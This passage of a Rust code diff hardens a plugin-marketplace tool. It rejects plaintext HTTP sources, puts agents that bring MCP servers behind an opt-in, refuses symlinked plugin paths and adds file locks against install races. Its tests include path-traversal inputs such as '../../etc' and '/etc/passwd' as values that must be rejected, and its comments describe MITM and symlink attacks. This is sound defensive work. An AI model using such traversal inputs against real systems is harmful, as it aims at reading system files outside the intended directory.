+/// guard.defuse();                     // disarmed
+/// ```
+///
+/// Errors during cleanup are logged at `warn!` (with the `label` field for
+/// tracability) rather than propagated — the guard runs from `Drop` where
+/// returning errors is impossible. The label appears in the warning so
+/// users debugging a leftover directory can grep their logs and find the
+/// originating call site without having to thread a path back through the
+/// stack.
+///
+/// `NotFound` on the cleanup is silently swallowed: a successful flow
+/// often unlinks the temp dir as part of its work (atomic rename) and
+/// the guard's job is then "make sure nothing is left," not "make sure
+/// something WAS there."
+pub(crate) struct DirCleanupGuard {
+    path: PathBuf,
+    label: &'static str,
+    defused: bool,
+}
+
+impl DirCleanupGuard {
+    /// Construct an armed guard. `label` appears in any cleanup-failure
+    /// warning to make leftover directories grep-able to their owner.
+    pub(crate) fn new(path: PathBuf, label: &'static str) -> Self {
+        Self {
+            path,
+            label,
+            defused: false,
+        }
+    }
+
+    /// Re-point the guard at a new on-disk location.
+    ///
+    /// Use after an atomic rename has moved the temp directory into its
+    /// final place. The previous path is no longer the guard's
+    /// responsibility — it has either ceased to exist (the rename
+    /// consumed it) or the caller has taken ownership of cleaning it up.
+    pub(crate) fn retarget(&mut self, new_path: PathBuf) {
+        self.path = new_path;
+    }
+
+    /// Prevent cleanup on drop (call after the operation has succeeded
+    /// or after the caller has handled cleanup explicitly along an error
+    /// path).
+    pub(crate) fn defuse(&mut self) {
+        self.defused = true;
+    }
+}
+
+impl Drop for DirCleanupGuard {
+    fn drop(&mut self) {
+        if self.defused {
+            return;
+        }
+        if let Err(e) = fs::remove_dir_all(&self.path)
+            && e.kind() != std::io::ErrorKind::NotFound
+        {
+            warn!(
+                path = %self.path.display(),
+                label = %self.label,
+                error = %e,
+                "failed to clean up directory — remove it manually"
+            );
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn drop_removes_armed_target() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let target = dir.path().join("victim");
+        fs::create_dir_all(&target).expect("mkdir");
+
+        {
+            let _guard = DirCleanupGuard::new(target.clone(), "test");
+        }
+        assert!(!target.exists(), "armed guard must remove target on drop");
+    }
+
+    #[test]
+    fn defuse_prevents_removal() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let target = dir.path().join("survivor");
+        fs::create_dir_all(&target).expect("mkdir");
+
+        {
+            let mut guard = DirCleanupGuard::new(target.clone(), "test");
+            guard.defuse();
+        }
+        assert!(target.exists(), "defused guard must NOT remove target");
+    }
+
+    #[test]
+    fn retarget_moves_cleanup_focus() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let original = dir.path().join("original");
+        let renamed = dir.path().join("renamed");
+        fs::create_dir_all(&original).expect("mkdir original");
+        // Simulate the post-rename state: original is gone, renamed exists.
+        fs::rename(&original, &renamed).expect("rename");
+        assert!(!original.exists());
+        assert!(renamed.exists());
+
+        {
+            let mut guard = DirCleanupGuard::new(original.clone(), "test");
+            guard.retarget(renamed.clone());
+        }
+        assert!(
+            !renamed.exists(),
+            "guard should have cleaned up the new path"
+        );
+    }
+
+    #[test]
+    fn drop_swallows_not_found_silently() {
+        // The successful path often consumes the temp dir before drop
+        // runs (atomic rename moves it). A NotFound on drop is expected
+        // and must not warn or panic.
+        let dir = tempfile::tempdir().expect("tempdir");
+        let nonexistent = dir.path().join("never-existed");
+
+        let _guard = DirCleanupGuard::new(nonexistent, "test");
+        // Drop runs at end of scope; if it panics or surfaces an error,
+        // this test fails. The implicit success is the assertion.
+    }
+}

--- a/crates/kiro-market-core/src/service.rs
+++ b/crates/kiro-market-core/src/service.rs
@@ -26,41 +26,10 @@ static PENDING_COUNTER: AtomicU64 = AtomicU64::new(0);
 // Temp directory cleanup guard
 // ---------------------------------------------------------------------------
 
-/// RAII guard that removes a temp directory on drop unless defused.
-/// Prevents orphaned `_pending_*` directories when `add()` fails.
-struct TempDirGuard {
-    path: PathBuf,
-    defused: bool,
-}
-
-impl TempDirGuard {
-    fn new(path: PathBuf) -> Self {
-        Self {
-            path,
-            defused: false,
-        }
-    }
-
-    /// Prevent cleanup on drop (call after successful rename).
-    fn defuse(&mut self) {
-        self.defused = true;
-    }
-}
-
-impl Drop for TempDirGuard {
-    fn drop(&mut self) {
-        if !self.defused
-            && let Err(e) = fs::remove_dir_all(&self.path)
-            && e.kind() != std::io::ErrorKind::NotFound
-        {
-            warn!(
-                path = %self.path.display(),
-                error = %e,
-                "failed to clean up temp directory — remove it manually"
-            );
-        }
-    }
-}
+// `TempDirGuard` was extracted into the shared `crate::raii::DirCleanupGuard`
+// — same shape, same Drop semantics, same retarget+defuse API. The
+// platform.rs Windows StagingGuard now uses the same primitive, so
+// future fixes to cleanup ordering or warn severity apply once.
 
 // ---------------------------------------------------------------------------
 // Result types
@@ -130,6 +99,91 @@ pub enum InstallFilter<'a> {
     All,
     Names(&'a [String]),
     SingleName(&'a str),
+}
+
+/// Whether `http://` marketplace URLs are permitted. Replaces a `bool`
+/// field that read identically at struct-literal call sites and could
+/// be silently flipped by a typo (`allow_insecure_http: true` looks no
+/// different from `allow_insecure_http: false` in a code review). The
+/// enum variants name the security posture explicitly.
+///
+/// `#[non_exhaustive]` so a future tightening (e.g. `AllowOnLocalhost`)
+/// is an additive change.
+#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)]
+#[non_exhaustive]
+pub enum InsecureHttpPolicy {
+    /// Refuse `http://` URLs. The strict default — plaintext HTTP is
+    /// unauthenticated and a network attacker can substitute the entire
+    /// marketplace contents, gaining persistent code execution via
+    /// skills/agents/MCP servers that the cache then keeps around.
+    #[default]
+    Reject,
+    /// Allow `http://` URLs. Only flip this when TLS truly isn't
+    /// available on the source's network — the resulting marketplace
+    /// install is trust-on-first-use against any MITM during the clone
+    /// window.
+    Allow,
+}
+
+/// Options controlling [`MarketplaceService::add`].
+///
+/// `#[non_exhaustive]` so adding future fields (`require_sha`,
+/// `allow_self_signed_tls`, …) is an additive change. External callers
+/// must therefore use the builder methods rather than struct-expression
+/// construction:
+///
+/// ```ignore
+/// MarketplaceAddOptions::new(GitProtocol::Https)
+///     .allow_insecure_http()
+/// ```
+///
+/// The `From<GitProtocol>` impl preserves the convenience of passing a
+/// bare protocol — `svc.add(source, GitProtocol::Https)` still compiles
+/// against the strict defaults.
+#[derive(Clone, Copy, Debug, Default)]
+#[non_exhaustive]
+pub struct MarketplaceAddOptions {
+    /// Git protocol used for GitHub `owner/repo` shorthand sources.
+    pub protocol: GitProtocol,
+    /// Policy for plaintext `http://` source URLs. See
+    /// [`InsecureHttpPolicy`] for the per-variant rationale.
+    pub insecure_http: InsecureHttpPolicy,
+}
+
+impl MarketplaceAddOptions {
+    /// Construct an options bag with the given git protocol and the
+    /// strict default for every other field. Builder methods follow.
+    #[must_use]
+    pub fn new(protocol: GitProtocol) -> Self {
+        Self {
+            protocol,
+            insecure_http: InsecureHttpPolicy::Reject,
+        }
+    }
+
+    /// Set the [`InsecureHttpPolicy`] explicitly. Useful when the
+    /// caller has the policy as a value already (e.g. mapped from a
+    /// CLI bool flag).
+    #[must_use]
+    pub fn with_insecure_http(mut self, policy: InsecureHttpPolicy) -> Self {
+        self.insecure_http = policy;
+        self
+    }
+
+    /// Shorthand for `with_insecure_http(InsecureHttpPolicy::Allow)`.
+    /// Reads naturally at call sites that decide statically to opt in.
+    #[must_use]
+    pub fn allow_insecure_http(self) -> Self {
+        self.with_insecure_http(InsecureHttpPolicy::Allow)
+    }
+}
+
+impl From<GitProtocol> for MarketplaceAddOptions {
+    /// Convenience for callers that only need to choose a protocol and
+    /// accept the strict defaults for everything else.
+    fn from(protocol: GitProtocol) -> Self {
+        Self::new(protocol)
+    }
 }
 
 /// Whether an install should overwrite existing entries of the same name.
@@ -234,6 +288,17 @@ pub enum InstallWarning {
         path: PathBuf,
         failure: crate::agent::ParseFailure,
     },
+    /// An agent declares MCP servers but the install was not opted in
+    /// to MCP. The agent was skipped — its prompt would otherwise
+    /// install with a `mcpServers` block that runs subprocesses or
+    /// opens network connections without the user's explicit consent.
+    /// Listed transports help the user see the risk surface (e.g.
+    /// `["stdio", "stdio", "http"]`) before they re-run with the
+    /// `--accept-mcp` opt-in.
+    McpServersRequireOptIn {
+        agent: String,
+        transports: Vec<String>,
+    },
 }
 
 impl std::fmt::Display for InstallWarning {
@@ -253,6 +318,15 @@ impl std::fmt::Display for InstallWarning {
             }
             InstallWarning::AgentParseFailed { path, failure } => {
                 write!(f, "skipped agent at {}: {failure}", path.display())
+            }
+            InstallWarning::McpServersRequireOptIn { agent, transports } => {
+                write!(
+                    f,
+                    "agent `{agent}` brings {} MCP server{} ({}); skipped — re-run with `--accept-mcp` to install",
+                    transports.len(),
+                    if transports.len() == 1 { "" } else { "s" },
+                    transports.join(", ")
+                )
             }
         }
     }
@@ -299,10 +373,30 @@ impl MarketplaceService {
     /// manifest nor scan), the marketplace name fails validation, or a
     /// marketplace with the same name is already registered.
     #[allow(clippy::too_many_lines)]
-    pub fn add(&self, source: &str, protocol: GitProtocol) -> Result<MarketplaceAddResult, Error> {
+    pub fn add(
+        &self,
+        source: &str,
+        opts: impl Into<MarketplaceAddOptions>,
+    ) -> Result<MarketplaceAddResult, Error> {
         use std::sync::atomic::Ordering;
 
+        let opts = opts.into();
+        let protocol = opts.protocol;
+
         let ms = MarketplaceSource::detect(source);
+
+        // Refuse plaintext HTTP unless the caller's policy allows it.
+        // Matching against the raw source string (not the parsed
+        // MarketplaceSource::GitUrl) is enough because GitHub shorthands
+        // and local paths can never carry an http scheme. The
+        // remediation message names the caller-facing knob.
+        if matches!(opts.insecure_http, InsecureHttpPolicy::Reject)
+            && let MarketplaceSource::GitUrl { url } = &ms
+            && url.starts_with("http://")
+        {
+            return Err(MarketplaceError::InsecureSource { url: url.clone() }.into());
+        }
+
         self.cache.ensure_dirs()?;
 
         let pending_seq = PENDING_COUNTER.fetch_add(1, Ordering::Relaxed);
@@ -323,7 +417,8 @@ impl MarketplaceService {
             }
         }
 
-        let mut guard = TempDirGuard::new(temp_dir.clone());
+        let mut guard =
+            crate::raii::DirCleanupGuard::new(temp_dir.clone(), "marketplace temp directory");
 
         let link_result = self.clone_or_link(&ms, protocol, &temp_dir)?;
         let storage = storage_from_source_and_link(&ms, link_result);
@@ -381,50 +476,80 @@ impl MarketplaceService {
         validation::validate_name(&name)?;
 
         let final_dir = self.cache.marketplace_path(&name);
-        if final_dir.exists() {
-            return Err(MarketplaceError::AlreadyRegistered { name: name.clone() }.into());
-        }
 
-        fs::rename(&temp_dir, &final_dir)?;
-        // Point the guard at the renamed location so its Drop targets the
-        // right path if we bail out before defusing.
-        guard.path.clone_from(&final_dir);
-
+        // Take the registry lock once for the whole "claim the name +
+        // rename + register" sequence. Without this single lock, two
+        // concurrent `add` calls for the same name could both pass the
+        // `final_dir.exists()` check, then race the rename (one wins, one
+        // fails with a confusing IO error or — worse on some platforms —
+        // both succeed and clobber each other's content).
+        //
+        // `register_known_marketplace_unlocked` is the inner counterpart
+        // to `add_known_marketplace` that assumes the caller already holds
+        // the lock. Calling the locking variant here would self-contend
+        // — the second acquire opens a fresh fd whose `try_lock_exclusive`
+        // can't succeed until the outer fd is dropped, so the polling
+        // loop in `with_file_lock` would stall for `LOCK_TIMEOUT` (10s)
+        // and surface `ErrorKind::TimedOut`.
         let entry = KnownMarketplace {
             name: name.clone(),
             source: ms,
             protocol: Some(protocol),
             added_at: chrono::Utc::now(),
         };
-        if let Err(e) = self.cache.add_known_marketplace(entry) {
-            warn!(
-                path = %final_dir.display(),
-                error = %e,
-                "registry write failed after rename; rolling back"
-            );
-            if let Err(rb) = fs::remove_dir_all(&final_dir) {
+
+        crate::file_lock::with_file_lock(&self.cache.registry_path(), || -> Result<(), Error> {
+            if final_dir.exists() {
+                return Err(MarketplaceError::AlreadyRegistered { name: name.clone() }.into());
+            }
+
+            fs::rename(&temp_dir, &final_dir)?;
+            // The temp dir no longer exists under its old name; from
+            // here on, any cleanup-on-failure must target `final_dir`.
+            guard.retarget(final_dir.clone());
+
+            if let Err(e) = self.cache.register_known_marketplace_unlocked(entry) {
                 warn!(
                     path = %final_dir.display(),
-                    rollback_error = %rb,
-                    "failed to roll back renamed directory — remove it manually"
+                    error = %e,
+                    "registry write failed after rename; rolling back"
+                );
+                if let Err(rb) = fs::remove_dir_all(&final_dir) {
+                    warn!(
+                        path = %final_dir.display(),
+                        rollback_error = %rb,
+                        "failed to roll back renamed directory — remove it manually"
+                    );
+                }
+                // Defuse so the guard doesn't try to remove what we
+                // already attempted to remove (or log a spurious
+                // warning if the rollback succeeded).
+                guard.defuse();
+                return Err(e);
+            }
+
+            // Persist the merged plugin list INSIDE the registry
+            // lock. Outside it, a concurrent `remove(name)` could
+            // complete (deleting plugin_registry_path) between our
+            // register call and this write, leaving an orphaned
+            // `registries/<name>.json` for an unregistered
+            // marketplace. Holding the lock makes the
+            // register-and-write sequence atomic from the
+            // marketplace registry's perspective. A write failure is
+            // still a soft fail — the user can re-run `update <name>`
+            // to regenerate — so we warn rather than roll back the
+            // marketplace registration.
+            if let Err(e) = self.cache.write_plugin_registry(&name, &registry_entries) {
+                warn!(
+                    marketplace = %name,
+                    error = %e,
+                    "failed to write plugin registry — run 'update {name}' to regenerate"
                 );
             }
-            // Defuse so the guard doesn't attempt a second removal of the
-            // same path (or log a spurious warning if rollback succeeded).
-            guard.defuse();
-            return Err(e);
-        }
-        guard.defuse();
 
-        // Persist the merged plugin list so browse/install commands don't
-        // need to re-scan the repo on every access.
-        if let Err(e) = self.cache.write_plugin_registry(&name, &registry_entries) {
-            warn!(
-                marketplace = %name,
-                error = %e,
-                "failed to write plugin registry — run 'update {name}' to regenerate"
-            );
-        }
+            guard.defuse();
+            Ok(())
+        })?;
 
         debug!(marketplace = %name, "marketplace added");
 
@@ -756,11 +881,19 @@ impl MarketplaceService {
     ) -> Result<PathBuf, Error> {
         match &entry.source {
             PluginSource::RelativePath(rel) => {
-                // `rel` is a validated `RelativePath` — no belt-and-braces
-                // check needed; construction through `RelativePath::new`
-                // is the only way to obtain one, and it validates.
+                // `rel` is a validated `RelativePath` — no traversal check
+                // needed; construction through `RelativePath::new` is the
+                // only way to obtain one, and it validates.
                 let resolved = marketplace_path.join(rel);
-                if !resolved.exists() {
+                // Use symlink_metadata (does NOT follow symlinks) so a
+                // malicious marketplace cannot point `rel` at a symlink
+                // that resolves outside the marketplace tree. Matches the
+                // symlink-refuse policy in project::copy_dir_recursive,
+                // agent::discover_agents_in_dirs, and load_plugin_manifest.
+                let is_real_dir = fs::symlink_metadata(&resolved)
+                    .map(|m| m.is_dir())
+                    .unwrap_or(false);
+                if !is_real_dir {
                     return Err(PluginError::DirectoryMissing { path: resolved }.into());
                 }
                 Ok(resolved)
@@ -819,33 +952,49 @@ impl MarketplaceService {
         // cannot hold an unvalidated string. Serde and programmatic callers
         // both go through `RelativePath::new`.
 
-        // If already cloned, reuse — but re-verify SHA so a corrupt or stale
-        // cache (e.g. the manifest's pinned SHA changed) cannot pass silently.
-        if dest.exists() {
-            debug!(dest = %dest.display(), "plugin already cached, reusing");
+        // Serialize concurrent callers on the same cache path. Without this,
+        // two processes racing on `kiro-market install foo@bar` for a
+        // not-yet-cached plugin would both see `!dest.exists()` and both
+        // attempt `clone_repo`, one clobbering the other. The lock also
+        // lets us recover from a partially-cloned directory left behind by
+        // a prior interrupted attempt (detected via missing `.git/`).
+        crate::file_lock::with_file_lock(&dest, || -> Result<PathBuf, Error> {
+            if dest.exists() {
+                // A complete clone leaves `.git/` behind. Its absence means
+                // the directory is partial (prior crash, interrupted clone)
+                // and must be removed before a retry can succeed.
+                if dest.join(".git").exists() {
+                    debug!(dest = %dest.display(), "plugin already cached, reusing");
+                    if let Some(expected) = sha {
+                        self.git.verify_sha(&dest, expected)?;
+                    }
+                    return Ok(match subdir {
+                        Some(path) => dest.join(path),
+                        None => dest.clone(),
+                    });
+                }
+                warn!(
+                    dest = %dest.display(),
+                    "removing partial plugin clone from prior interrupted attempt"
+                );
+                fs::remove_dir_all(&dest)?;
+            }
+
+            debug!(url = %url, dest = %dest.display(), label = %label, "cloning plugin");
+            let validated_ref = git_ref.map(GitRef::new).transpose()?;
+            let opts = CloneOptions {
+                git_ref: validated_ref,
+            };
+            self.git.clone_repo(&url, &dest, &opts)?;
+
             if let Some(expected) = sha {
                 self.git.verify_sha(&dest, expected)?;
             }
-            return Ok(match subdir {
+
+            Ok(match subdir {
                 Some(path) => dest.join(path),
-                None => dest,
-            });
-        }
-
-        debug!(url = %url, dest = %dest.display(), label = %label, "cloning plugin");
-        let validated_ref = git_ref.map(GitRef::new).transpose()?;
-        let opts = CloneOptions {
-            git_ref: validated_ref,
-        };
-        self.git.clone_repo(&url, &dest, &opts)?;
-
-        if let Some(expected) = sha {
-            self.git.verify_sha(&dest, expected)?;
-        }
-
-        Ok(match subdir {
-            Some(path) => dest.join(path),
-            None => dest,
+                None => dest.clone(),
+            })
         })
     }
 
@@ -869,16 +1018,17 @@ impl MarketplaceService {
     ///   error. The CLI surfaces these with a non-zero exit status.
     /// - `warnings`: non-fatal issues (unmapped tools, README-like files
     ///   skipped, missing-name frontmatter).
-    #[allow(clippy::too_many_arguments)] // seven non-self params, each a distinct
-    // input from upstream: project + plugin_dir + scan_paths + force +
-    // marketplace + plugin + version. A builder would add indirection without
-    // reducing arity at the call site.
+    #[allow(clippy::too_many_arguments)] // eight non-self params, each a distinct
+    // input from upstream: project + plugin_dir + scan_paths + mode +
+    // accept_mcp + marketplace + plugin + version. A builder would add
+    // indirection without reducing arity at the call site.
     pub fn install_plugin_agents(
         &self,
         project: &crate::project::KiroProject,
         plugin_dir: &Path,
         scan_paths: &[String],
         mode: InstallMode,
+        accept_mcp: bool,
         marketplace: &str,
         plugin: &str,
         version: Option<&str>,
@@ -917,6 +1067,27 @@ impl MarketplaceService {
                     continue;
                 }
             };
+
+            // MCP opt-in gate. An agent that brings MCP servers can run
+            // arbitrary subprocesses (Stdio) or open network connections
+            // (Http/Sse) on the user's host. The cache persists, so a
+            // one-time install is a long-lived foothold. Default policy:
+            // skip + warn so the user sees the risk surface; re-running
+            // with `--accept-mcp` flips the gate.
+            if !accept_mcp && !def.mcp_servers.is_empty() {
+                let transports: Vec<String> = def
+                    .mcp_servers
+                    .values()
+                    .map(|cfg| cfg.transport_label().to_owned())
+                    .collect();
+                result
+                    .warnings
+                    .push(InstallWarning::McpServersRequireOptIn {
+                        agent: def.name.clone(),
+                        transports,
+                    });
+                continue;
+            }
 
             let (mapped, unmapped) = match def.dialect {
                 crate::agent::AgentDialect::Claude => {
@@ -1256,6 +1427,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "plugin-x",
             None,
@@ -1287,7 +1459,8 @@ mod tests {
             .iter()
             .filter_map(|w| match w {
                 InstallWarning::UnmappedTool { tool, reason, .. } => Some((tool.as_str(), *reason)),
-                InstallWarning::AgentParseFailed { .. } => None,
+                InstallWarning::AgentParseFailed { .. }
+                | InstallWarning::McpServersRequireOptIn { .. } => None,
             })
             .collect();
         assert!(
@@ -1330,6 +1503,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             None,
@@ -1374,6 +1548,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             None,
@@ -1425,6 +1600,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             None,
@@ -1438,6 +1614,225 @@ mod tests {
                 .any(|w| matches!(w, InstallWarning::AgentParseFailed { .. })),
             "missing-fence non-README file must be demoted silently, got: {:?}",
             result.warnings
+        );
+    }
+
+    #[test]
+    fn install_plugin_agents_skips_mcp_agents_without_opt_in() {
+        // An agent declaring an MCP server must NOT be installed when
+        // accept_mcp is false. Default safety: a passing-by user shouldn't
+        // accidentally accept arbitrary subprocess execution. The skip
+        // surfaces as a McpServersRequireOptIn warning so the user can
+        // see what got skipped and how to opt in.
+        use crate::project::KiroProject;
+
+        let (_dir, svc) = temp_service();
+        let plugin_tmp = tempfile::tempdir().unwrap();
+        let agents_dir = plugin_tmp.path().join("agents");
+        fs::create_dir_all(&agents_dir).unwrap();
+
+        // Copilot-style .agent.md with one stdio MCP entry.
+        fs::write(
+            agents_dir.join("terraformer.agent.md"),
+            "---\nname: terraformer\ndescription: TF\nmcp-servers:\n  tf:\n    type: 'local'\n    command: 'docker'\n    args: ['run', '-i']\n---\nbody\n",
+        )
+        .unwrap();
+
+        let project_tmp = tempfile::tempdir().unwrap();
+        let project = KiroProject::new(project_tmp.path().to_path_buf());
+
+        let result = svc.install_plugin_agents(
+            &project,
+            plugin_tmp.path(),
+            &["./agents/".to_string()],
+            InstallMode::New,
+            false, // accept_mcp = false → gate must fire
+            "mp",
+            "p",
+            None,
+        );
+
+        assert!(
+            result.installed.is_empty(),
+            "MCP agent must not be installed without opt-in: {:?}",
+            result.installed
+        );
+        assert!(
+            result.warnings.iter().any(
+                |w| matches!(w, InstallWarning::McpServersRequireOptIn { agent, transports }
+                    if agent == "terraformer" && transports == &vec!["stdio".to_string()])
+            ),
+            "expected McpServersRequireOptIn warning naming the agent and stdio transport, got {:?}",
+            result.warnings
+        );
+        // No JSON written for the skipped agent.
+        assert!(
+            !project_tmp
+                .path()
+                .join(".kiro/agents/terraformer.json")
+                .exists()
+        );
+    }
+
+    #[test]
+    fn install_plugin_agents_installs_mcp_agents_when_opted_in() {
+        // accept_mcp = true unlocks installation, including the
+        // mcpServers block in the emitted JSON.
+        use crate::project::KiroProject;
+
+        let (_dir, svc) = temp_service();
+        let plugin_tmp = tempfile::tempdir().unwrap();
+        let agents_dir = plugin_tmp.path().join("agents");
+        fs::create_dir_all(&agents_dir).unwrap();
+        fs::write(
+            agents_dir.join("terraformer.agent.md"),
+            "---\nname: terraformer\ndescription: TF\nmcp-servers:\n  tf:\n    type: 'local'\n    command: 'docker'\n    args: ['run', '-i']\n---\nbody\n",
+        )
+        .unwrap();
+
+        let project_tmp = tempfile::tempdir().unwrap();
+        let project = KiroProject::new(project_tmp.path().to_path_buf());
+
+        let result = svc.install_plugin_agents(
+            &project,
+            plugin_tmp.path(),
+            &["./agents/".to_string()],
+            InstallMode::New,
+            true, // accept_mcp = true → gate is bypassed
+            "mp",
+            "p",
+            None,
+        );
+
+        assert_eq!(result.installed, vec!["terraformer".to_string()]);
+        assert!(
+            !result
+                .warnings
+                .iter()
+                .any(|w| matches!(w, InstallWarning::McpServersRequireOptIn { .. })),
+            "no MCP-opt-in warning when opted in: {:?}",
+            result.warnings
+        );
+
+        // The emitted JSON contains the typed-and-normalized mcpServers block:
+        // `type: 'local'` came in via the Copilot alias and is emitted as `stdio`.
+        let json_path = project_tmp.path().join(".kiro/agents/terraformer.json");
+        let json: serde_json::Value =
+            serde_json::from_str(&fs::read_to_string(&json_path).unwrap()).unwrap();
+        assert_eq!(json["mcpServers"]["tf"]["type"], "stdio");
+        assert_eq!(json["mcpServers"]["tf"]["command"], "docker");
+    }
+
+    #[test]
+    fn install_plugin_agents_lists_all_mcp_transports_in_warning() {
+        // An agent with multiple MCP servers of different transports
+        // should surface ALL of them in the warning's `transports` vec.
+        // A regression where only one transport gates the install (or
+        // only one is reported) would leave the user blind to part of
+        // the risk surface.
+        use crate::project::KiroProject;
+
+        let (_dir, svc) = temp_service();
+        let plugin_tmp = tempfile::tempdir().unwrap();
+        let agents_dir = plugin_tmp.path().join("agents");
+        fs::create_dir_all(&agents_dir).unwrap();
+        fs::write(
+            agents_dir.join("multi.agent.md"),
+            "---\n\
+             name: multi\n\
+             description: \"Multiple MCP transports\"\n\
+             mcp-servers:\n  \
+               local_tool:\n    \
+                 type: 'local'\n    \
+                 command: 'docker'\n  \
+               http_tool:\n    \
+                 type: http\n    \
+                 url: https://mcp.example.com\n  \
+               another_local:\n    \
+                 type: stdio\n    \
+                 command: 'node'\n\
+             ---\n\
+             body\n",
+        )
+        .unwrap();
+
+        let project_tmp = tempfile::tempdir().unwrap();
+        let project = KiroProject::new(project_tmp.path().to_path_buf());
+
+        let result = svc.install_plugin_agents(
+            &project,
+            plugin_tmp.path(),
+            &["./agents/".to_string()],
+            InstallMode::New,
+            false,
+            "mp",
+            "p",
+            None,
+        );
+        assert!(result.installed.is_empty(), "MCP agent must be skipped");
+
+        let mcp_warning = result
+            .warnings
+            .iter()
+            .find_map(|w| match w {
+                InstallWarning::McpServersRequireOptIn { agent, transports } => {
+                    Some((agent, transports))
+                }
+                _ => None,
+            })
+            .expect("expected McpServersRequireOptIn warning");
+        assert_eq!(mcp_warning.0, "multi");
+        // Transports come out in BTreeMap iteration order on the agent's
+        // `mcp_servers` keys (alphabetical): another_local, http_tool, local_tool.
+        assert_eq!(
+            mcp_warning.1,
+            &vec!["stdio".to_string(), "http".to_string(), "stdio".to_string()],
+            "all transports must appear in the warning so the user sees the full risk surface"
+        );
+    }
+
+    #[test]
+    fn install_plugin_agents_force_does_not_bypass_mcp_gate() {
+        // Regression guard: a future change that wires `mode == Force`
+        // to skip the MCP opt-in check would silently install
+        // subprocess-spawning agents. The gate must fire even under
+        // --force; --accept-mcp is the only opt-in.
+        use crate::project::KiroProject;
+
+        let (_dir, svc) = temp_service();
+        let plugin_tmp = tempfile::tempdir().unwrap();
+        let agents_dir = plugin_tmp.path().join("agents");
+        fs::create_dir_all(&agents_dir).unwrap();
+        fs::write(
+            agents_dir.join("force-test.agent.md"),
+            "---\nname: forcetest\nmcp-servers:\n  s:\n    type: 'local'\n    command: 'docker'\n---\nbody\n",
+        )
+        .unwrap();
+
+        let project_tmp = tempfile::tempdir().unwrap();
+        let project = KiroProject::new(project_tmp.path().to_path_buf());
+
+        let result = svc.install_plugin_agents(
+            &project,
+            plugin_tmp.path(),
+            &["./agents/".to_string()],
+            InstallMode::Force, // <-- force, but...
+            false,              // <-- accept_mcp = false should still gate
+            "mp",
+            "p",
+            None,
+        );
+        assert!(
+            result.installed.is_empty(),
+            "force MUST NOT bypass the MCP opt-in: {:?}",
+            result.installed
+        );
+        assert!(
+            result
+                .warnings
+                .iter()
+                .any(|w| matches!(w, InstallWarning::McpServersRequireOptIn { .. })),
+            "MCP warning still expected under force when accept_mcp is false"
         );
     }
 
@@ -1460,6 +1855,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             None,
@@ -1473,6 +1869,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             None,
@@ -1508,6 +1905,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             Some("1.0.0"),
@@ -1528,6 +1926,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::Force,
+            false, // accept_mcp: this fixture's agents have no MCP entries
             "mp",
             "p",
             Some("2.0.0"),
@@ -1590,6 +1989,7 @@ mod tests {
             plugin_tmp.path(),
             &["./agents/".to_string()],
             InstallMode::New,
+            false, // accept_mcp: existing fixtures don't carry MCP servers
             "mp",
             "p",
             None,
@@ -1627,7 +2027,9 @@ mod tests {
     impl GitBackend for MockGitBackend {
         fn clone_repo(&self, url: &str, dest: &Path, _opts: &CloneOptions) -> Result<(), GitError> {
             self.calls.lock().unwrap().push(format!("clone:{url}"));
-            // Create dest with a minimal marketplace manifest.
+            // Create dest with a minimal marketplace manifest and a
+            // `.git/HEAD` marker that `resolve_structured_source` checks
+            // to distinguish a complete clone from a partial one.
             let mp_dir = dest.join(".claude-plugin");
             fs::create_dir_all(&mp_dir).unwrap();
             fs::write(
@@ -1635,6 +2037,9 @@ mod tests {
                 r#"{"name":"mock-market","owner":{"name":"Test"},"plugins":[{"name":"mock-plugin","description":"A mock plugin","source":"./plugins/mock"}]}"#,
             )
             .unwrap();
+            let git_dir = dest.join(".git");
+            fs::create_dir_all(&git_dir).unwrap();
+            fs::write(git_dir.join("HEAD"), b"ref: refs/heads/main\n").unwrap();
             Ok(())
         }
 
@@ -1720,7 +2125,123 @@ mod tests {
         assert!(crate::validation::RelativePath::new("../../etc").is_err());
         assert!(crate::validation::RelativePath::new("/etc/passwd").is_err());
         assert!(crate::validation::RelativePath::new("\0").is_err());
+        assert!(crate::validation::RelativePath::new("sub\\..\\etc").is_err());
         assert!(crate::validation::RelativePath::new("ok/path").is_ok());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn resolve_plugin_dir_refuses_symlinked_relative_path() {
+        // Regression: a malicious marketplace could drop a symlink at
+        // `plugins/foo -> /etc` and, because `Path::exists()` follows
+        // symlinks, an earlier resolve_plugin_dir would return the
+        // resolved symlink target — letting the install pull files
+        // from outside the marketplace tree. The fix uses
+        // `fs::symlink_metadata` and refuses any symlinked path as
+        // "directory missing."
+        let (dir, svc) = temp_service();
+        let marketplace_path = dir.path().join("marketplace");
+        fs::create_dir_all(&marketplace_path).expect("create marketplace root");
+
+        let target = dir.path().join("outside");
+        fs::create_dir_all(&target).expect("create target dir");
+        std::os::unix::fs::symlink(&target, marketplace_path.join("plugins"))
+            .expect("create symlink");
+
+        let entry = PluginEntry {
+            name: "foo".to_string(),
+            description: None,
+            source: PluginSource::RelativePath(
